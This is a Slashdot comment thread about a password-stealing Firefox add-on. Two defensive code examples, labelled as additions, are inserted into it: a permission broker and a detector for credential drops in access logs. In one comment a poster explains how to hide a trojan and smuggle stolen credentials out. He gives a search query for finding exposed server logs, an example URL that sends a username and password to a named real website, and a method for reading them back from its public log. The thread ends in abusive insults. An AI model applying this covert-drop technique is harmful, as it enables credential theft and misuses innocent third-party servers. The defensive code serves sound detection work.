How the Mozilla Sniffer Backdoor Was Discovered
An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."
I mean seriously, the addons give access to everything you do in the browser. A lot of people here on Slashdot know not to run random executables from the Internet, but do nothing to check if their browser addons are secure and not malware.
This is why I love that Opera comes built-in with all the features you need and a lot more. Not only are they made using the same quality standards and conventions, there is no way some rogue developer could hide password stealing code in them.
Looks like the stolen data was being sent to a hacked BlueHost account. Figures.
What was the addon supposed to do?
I'm sure there's some parallel regarding the Android vs Apple's logic in distributing apps... but I'll likely be moderated a troll on /. for pointing them out...
Good job not actually telling the name of the offending plugin in the article blurb there. 'A new severe bug in mozilla is allowing hooligans to steal your passwords. But we won't tell you which one until after the break!'
I have nothing compelling to say
Do you mean to say that, when I install a Firefox add-on, Firefox won't give a list of requested privileges? Why has it taken 30 years for people who think in Unix security terms to not catch up to the VMS "fine-grained privileges to executables for users" security model?
The whole regular user / root thing is awful. Microsoft is still doing it wrong because, while the NT kernel may approach the right idea, it builds atop it a mess of get-out-of-jail-free paths.
It's not impossible.
(1) By default, allow nothing;
(2) Never allow everything - require software to specify exactly what it needs;
(3) Classify permissions so the user is alerted more violently for more risky permissions - this may depend on the circumstances (e.g. a browser add-on usually shouldn't be asking for the same sort of privileges as backup software);
(4) Software which needs an unusually privileged environment may benefit from auditing and signing, but never make this compulsory because this pisses off everyone;
(5) But, by default, refuse in such circumstances and indicate why. The user needs to make a conscious effort to override a reasonable set of auto-refusal defaults;
(6) Distinguish explicitly between once, occasional, time-limited and forever permissions. To take a particularly insidious example: iPhones ask if you want to give permission for your app to read your GPS location. This isn't permission for the next 15 minutes or day; it's permission forever. That is wrong. Looked at from the other end, don't do a Vista and ask every time. This is worse than not asking at all.
More thoughts, guise?
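An added illustration of the deny-by-default model sketched in the post above; this is not code from the thread, from Mozilla or from any real browser, and the permission catalogue, the software "contexts" and the permission names are all hypothetical. It shows the six rules as a small permission broker: nothing is allowed unless the manifest declared it, a wildcard manifest is rejected, each permission carries a risk tier the UI can escalate on, permissions unusual for the kind of software are auto-refused with a reason unless the user consciously overrides, and grants are recorded as once, time-limited or forever.

```python
"""Deny-by-default permission broker (added example, hypothetical catalogue)."""
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
import time


class Risk(Enum):
    LOW = 1      # e.g. read the active tab's title
    MEDIUM = 2   # e.g. read browsing history
    HIGH = 3     # e.g. saved passwords, unrestricted network, local files


# Hypothetical catalogue: permission -> (risk tier, kinds of software it is normal for)
CATALOGUE = {
    "tabs.read_title":  (Risk.LOW,    {"addon"}),
    "history.read":     (Risk.MEDIUM, {"addon"}),
    "network.any_host": (Risk.HIGH,   {"addon", "backup"}),
    "passwords.read":   (Risk.HIGH,   {"password_manager"}),
    "filesystem.read":  (Risk.HIGH,   {"backup"}),
}


class Duration(Enum):
    ONCE = "once"        # consumed by the first use
    TIMED = "timed"      # valid until expires_at
    FOREVER = "forever"  # persistent, the GPS-style grant the post objects to


@dataclass
class Grant:
    duration: Duration
    expires_at: Optional[float] = None   # only meaningful for TIMED
    used: bool = False                   # only meaningful for ONCE


def validate_manifest(declared):
    """Rule 2: software must enumerate exactly what it needs; '*' is refused outright."""
    if "*" in declared:
        raise ValueError("manifest requests everything; refused")
    unknown = sorted(p for p in declared if p not in CATALOGUE)
    if unknown:
        raise ValueError(f"unknown permissions: {unknown}")
    return set(declared)


@dataclass
class Broker:
    context: str              # kind of software, e.g. "addon" or "backup"
    declared: set             # permissions enumerated in the manifest
    grants: dict = field(default_factory=dict)

    def evaluate(self, perm, override=False):
        """Rules 1, 3 and 5: deny anything undeclared; auto-refuse, with the reason,
        a permission that is unusual for this context unless the user overrides;
        otherwise prompt, returning the risk tier so the UI can escalate for HIGH."""
        if perm not in CATALOGUE:
            return ("deny", "unknown permission")
        if perm not in self.declared:
            return ("deny", "not declared in manifest")
        risk, normal_for = CATALOGUE[perm]
        if self.context not in normal_for and not override:
            return ("refuse", f"{risk.name}-risk permission is unusual for {self.context}")
        return ("prompt", risk.name)

    def grant(self, perm, duration, seconds=None, now=None):
        """Rule 6: record the user's decision together with an explicit duration."""
        now = time.time() if now is None else now
        expires = now + seconds if duration is Duration.TIMED else None
        self.grants[perm] = Grant(duration, expires)

    def is_allowed(self, perm, now=None):
        """Runtime check: a ONCE grant is consumed by its first use, a TIMED grant
        expires, a FOREVER grant persists; anything ungranted is denied."""
        now = time.time() if now is None else now
        g = self.grants.get(perm)
        if g is None:
            return False
        if g.duration is Duration.ONCE:
            if g.used:
                return False
            g.used = True
            return True
        if g.duration is Duration.TIMED:
            return now < g.expires_at
        return True


if __name__ == "__main__":
    broker = Broker("addon", validate_manifest({"tabs.read_title", "filesystem.read"}))
    print(broker.evaluate("filesystem.read"))           # refused: unusual for an addon
    broker.grant("tabs.read_title", Duration.TIMED, seconds=900)
    print(broker.is_allowed("tabs.read_title"))         # True for the next 15 minutes
```

The "refuse" decision is distinct from "deny" on purpose: a denied request is final, while a refused one tells the user why and can be turned into a prompt only by passing `override=True`, which is the conscious effort rule 5 asks for.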
This guy is a native English speaker with a good education and almost surely a security professional trying to see how far he can get.
The typos he has NOT made give it away, among other clues:
(1) "it's" is always correctly used
(2) looks like he deliberately added plurals making it look as though his English is poor
(3) John "Devid"
(4) "check it out"
(5) "don't" is correct
(6) no other spelling characteristic Eastern European mistakes
Just my opinion, I could be wrong.
.. when you install an unverified, experimental Firefox extension from an untrusted author! Firefox extensions are great because of their power to affect the entire browser and even the host computer, which is what made Firefox popular IMO. But this comes with obvious risks you shouldn't ignore!
Not only that, but the author couldn't even use proper English in the addon description:
Given that, I hate to say that "people had it coming", but I figure people had ample warning that they were trying something that could be malicious.
on Apple's store you're suggesting we avoid Apple products? I figure you were going to imply Android as being less safe, but the only recent story about market safety I have seen is someone exploiting iTunes accounts to the benefit of a single developer.
though it would be interesting to have two bad apps released simultaneously into both markets and see which one gets caught first
* Winners compare their achievements to their goals, losers compare theirs to that of others.
Simples
that extension is dead.
this is just a placeholder till I send back my real sig from the future.
Obviously, their grammatical misconceptions cost them something, this time.
HBI's Law: Frequency of calling others Nazis is directly correlated with the likelihood of the accuser being Communist.
The addon was called "Mozilla Sniffer", and people still installed it? I would understand if this was some functionality hidden in a valid-sounding addon, but it's called "Mozilla Sniffer". User FAIL.
Rob
You could try Dillo.
Do what thou wilt shall be the whole of the Law
That's a lie, unless you're suggesting that they planted the rogue addon themselves. Why would they do that? Yes, it was called "Mozilla Sniffer" and they should have pulled it immediately, without review, for violating their trademark. But nothing indicates that this addon was released by Mozilla or anyone associated with Mozilla.
When writing Trojans like this, there are several considerations that this author failed on.
1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.
Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.
Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log
Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).
Then my rogue program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...
Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com), and it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rogue program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).
Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.
This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.
PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.
I use Mac OS, so I'm indemnified from having to pay the $699 indulgence to cover my cocksmoking and teabagging. So SCOX[Q] off!
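The defender's view of the log-file drop described in the post above, as an added example written for this thread rather than code from the post's author: what the channel looks like in the access log of the innocent bystander server, and what an operator of such a server could alert on. The log lines are constructed (RFC 5737 documentation addresses, a made-up path and a made-up password value). The detector flags two things that stand out in an ordinary access log: a query string carrying credential-shaped parameter names, and a client fetching the server's own log files; a client that does both matches the pattern the post describes for the infected PC and for the retrieving party alike. Parameter names are a weak signal on their own, since the post itself says a real payload would be encoded; the stronger signal, and the one the operator controls, is that the log directory is reachable over HTTP at all.

```python
"""Access-log detector for the described log-file drop (added example; sample lines constructed)."""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format request line, e.g. Apache's default access log
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# Query parameter names that have no business on a public site's URLs
CRED_KEYS = {"user", "username", "login", "pwd", "pass", "password", "passwd"}
# Paths that look like the server's own logs being served over HTTP
LOGFILE_RE = re.compile(r'(^|/)(logs?|access_log|error_log)(/|$)|\.log$', re.I)

# Constructed sample: one client drops a credential-shaped URL and reads the log
# back a second later; another client is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jul/2010:09:24:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [15/Jul/2010:09:24:02 +0000] "GET /stolen_info?user=alice&pwd=notarealpassword&site=example.net HTTP/1.1" 404 210
203.0.113.5 - - [15/Jul/2010:09:24:03 +0000] "GET /logs/access.log HTTP/1.1" 200 9182
198.51.100.7 - - [15/Jul/2010:09:30:11 +0000] "GET /about.html HTTP/1.1" 200 1024
""".splitlines()


def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings_for(entry):
    """Findings for a single parsed request. Note the 404 in the sample: the dropped
    URL need not exist, the server records the full request line regardless."""
    url = urlsplit(entry["path"])
    out = []
    cred = sorted(k for k in parse_qs(url.query, keep_blank_values=True)
                  if k.lower() in CRED_KEYS)
    if cred:
        out.append(("credential_in_query", ",".join(cred)))
    if LOGFILE_RE.search(url.path):
        out.append(("logfile_fetch", url.path))
    return out


def scan(lines):
    """Scan log lines; returns (client ip, finding kind, detail) tuples in log order."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for kind, detail in findings_for(entry):
            results.append((entry["ip"], kind, detail))
    return results


def suspicious_clients(lines):
    """Clients that both dropped credential-shaped data and read the log back.
    As the post notes, the infected PC and the collector behave the same way from
    the bystander's side, so this names the behaviour, not the attacker."""
    kinds = {}
    for ip, kind, _ in scan(lines):
        kinds.setdefault(ip, set()).add(kind)
    both = {"credential_in_query", "logfile_fetch"}
    return {ip for ip, seen in kinds.items() if both <= seen}


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
    print("clients doing both:", sorted(suspicious_clients(SAMPLE_LOG)))
```

For the bystander the fix is configuration, not detection: keep the log directory outside the document root or deny it in the web server, and the retrieval half of the channel disappears. The detector is still worth running on existing logs, because it also surfaces the drops that already happened, and a host that should not be serving logs but sees `logfile_fetch` hits has a misconfiguration to correct.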
An add-on called "Mozilla Sniffer" was uploaded on June 6th to addons.mozilla.org.
That’s like uploading an add-on called “Windows Virus”. Who the hell would install that?
I mean even Joe DontKnowShit would think twice before installing something that reminds him of a TLA agent or spy trying to get a look at his privates.
Any sufficiently advanced intelligence is indistinguishable from stupidity.
and you find a domain name. I wonder why he used an IP instead???
Ok, ok. What if the Italian pool boy's name is Mozilla and he likes sniffing "backdoors"?
Winkey shortcut mapping for 64bit windows. WinKeyPlus
jwhois 74.220.219.77
[Querying whois.arin.net]
[whois.arin.net]
OrgName: Bluehost Inc.
OrgID: BLUEH-2
Address: 1958 South 950 East
City: Provo
StateProv: UT
PostalCode: 84606
Country: US
So has law enforcement been notified?
...with the fact that you own a secret spy headquarters. How may I join your rogue organization? I assume you will simply show up one day by rappelling from the ceiling and giving me the choice to join, or to die. I already own a black outfit from the time I played Hudson Hawk in a stage production of the film (those critics didn't understand my interpretation of Hudson as a jaded post-Katrina Robin Hood), and would be ready to learn. I think I am qualified for at least henchman status, though I would insist on a career path that could possibly lead to a global enforcer position, like Angelina Jolie plays in Salt. In any case, I await your arrival.
It figures that these two words would appear together in a story about the most bloated, memory-leaking browser ever...
...snip...
I don't bother making reports - I guess if I did, I might get my name attached to some zero-day thingy. Hmmmm. That might not be good either. The better known you are, the harder it is to stay anonymous when you really WANT to be anonymous!
For some things like this you MUST have a zero-day tossable email account, one that does not have an address book or shared password. Since email accounts expect an existing email account to validate, use a company account to validate a Yahoo to validate a Gmail to validate a Microsoft to validate your TOSSABLE. Law enforcement can still get to you, but hackers outside the law would have to hack security at at least two companies to get to you. While we are at it, keep a LiveDVD with a browser that works and use it to access money sites. In some cases a LiveUSB key with a small file system partition to keep links handy is justified. vim -x handy-links4bob
Truth is stranger than fiction, but it is because Fiction is obliged to stick to possibilities; Truth isn't. Mark Twain.
"I prefer Firefox's way of offering a basic browser and moving extended or niche features to optional extensions to monolithic blocks like Opera." -- silanea (1241518), Thursday July 15, @09:24AM (#32912378)
I have to admit that I have read your history this week here and that you are indeed stupid as most all of your repliers have been saying, as well as a firefox fanboy troll type here. This next summation of your stupidity via quoting you really takes the cake though:
"Of course there is a risk associated with this model, but in my case the benefits far outweigh that risk." -- silanea (1241518), Thursday July 15, @09:24AM (#32912378)
Yes, the risk is a browser that consistently has more security issues in it over time than Opera has had, for one thing, and also that Firefox has been consistently slower than Opera over time also in all things web over time typically.
(You truly are stupid, and an obvious firefox shill)
See subject above, you retarded moron. The amusing part of your posts here is that you make it terribly obvious you are nothing more than another firefox fanboy shill in your posts in this very exchange, because you try to make it seem that "it's ok that firefox is slower than Opera and has more security bugs than Opera also". Who are you kidding except yourself, idiot?